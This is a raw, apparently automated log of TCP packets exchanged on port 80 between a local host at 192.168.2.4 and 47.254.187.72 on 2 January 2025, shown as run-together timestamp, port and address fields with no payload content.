                                                                            Jan 2, 2025 20:34:51.712080002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.712083101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.712090015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.712106943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.712116957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.712119102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.712126970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.712140083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.712150097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.712151051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.712162018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.712172985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.712204933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.714086056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.714097977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.714108944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.714124918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.714135885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.714138031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.714145899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.714155912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.714157104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.714165926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.714174032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.714204073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.715301991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.715322018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.715333939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.715352058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.715358019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.715362072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.715373039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.715377092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.715384007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.715408087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.715420008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.769788980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.769817114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.769829035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.769840002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.769850969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.769862890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.769876003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.769886017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.769901991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.769932985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.769932985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.771595955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.771620989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.771631956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.771642923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.771653891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.771663904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.771665096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.771677017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.771687031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.771706104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.771728039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772480965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772522926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772532940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772542953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772543907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772555113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772562981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772566080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772582054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772593021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772609949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772627115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772631884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772713900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772726059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772737980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772748947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772758961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772764921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772777081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772788048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772794008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772804976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772806883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772814989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.772841930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.772855043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.774286985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.774332047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.774369955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.774382114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.774394989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.774405956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.774413109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.774415970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.774426937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.774430037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.774466038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775190115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775211096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775223017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775230885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775239944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775253057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775259972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775262117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775273085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775286913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775305033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775326967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775333881 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775337934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775350094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775361061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775363922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775392056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775410891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775422096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775424004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775433064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775443077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775448084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775461912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775473118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775473118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775484085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775501013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775527000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775542021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775563002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775573969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775585890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775585890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775595903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775604010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775609016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.775635958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.775648117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.785418034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785460949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785470963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785490990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785501957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785505056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.785511971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785522938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785532951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785545111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.785552025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.785573006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.785583019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.788610935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.788666964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.788676023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.788687944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.788688898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.788700104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.788711071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.788711071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.788723946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.788753033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.788753986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.788775921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.788815975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.790956974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.790977955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.790988922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.790999889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.791012049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.791017056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.791027069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.791027069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.791038990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.791074038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.791099072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.793632984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.793646097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.793657064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.793675900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.793694019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.793695927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.793705940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.793715954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.793719053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.793728113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.793754101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.793766975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.798784971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798804998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798815966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798826933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798837900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798849106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798850060 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.798861027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798868895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.798871040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798882961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798892975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798913956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.798916101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798926115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798935890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.798942089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798953056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798962116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.798963070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.798989058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.799005032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.799007893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.799015999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.799056053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.800900936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.800921917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.800932884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.800945044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.800951004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.800955057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.800966978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.800976038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.800977945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.800988913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.801021099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.801042080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.802061081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.802073956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.802084923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.802108049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.802110910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.802129030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.802136898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.802140951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.802156925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.802167892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.802170038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.802189112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.802205086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.856599092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.856616974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.856628895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.856641054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.856652021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.856662989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.856673956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.856688976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.856739044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.856786013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.858460903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.858473063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.858484983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.858495951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.858508110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.858517885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.858527899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.858530045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.858540058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.858558893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.858582020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.859394073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859405041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859415054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859426022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859443903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859452963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.859455109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859467030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859474897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.859477043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859487057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859497070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859508038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.859508038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.859524965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859540939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.859543085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859554052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859563112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.859564066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859575033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.859599113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.859626055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.861001968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861013889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861061096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861068964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.861072063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861092091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861099958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.861126900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861131907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.861138105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861150026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861166000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.861201048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.861907959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861964941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.861984968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.861994982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862006903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862018108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862029076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862032890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862040043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862050056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862061977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862072945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862097979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862099886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862109900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862119913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862143993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862152100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862162113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862164021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862174034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862183094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862195969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862236977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862252951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862263918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862273932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862283945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862297058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862301111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862328053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862335920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862350941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862380981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.862402916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.862443924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.872400045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.872415066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.872433901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.872446060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.872451067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.872457027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.872476101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.872476101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.872488022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.872498989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.872505903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.872524023 CET4973080192.168.2.447.254.187.72
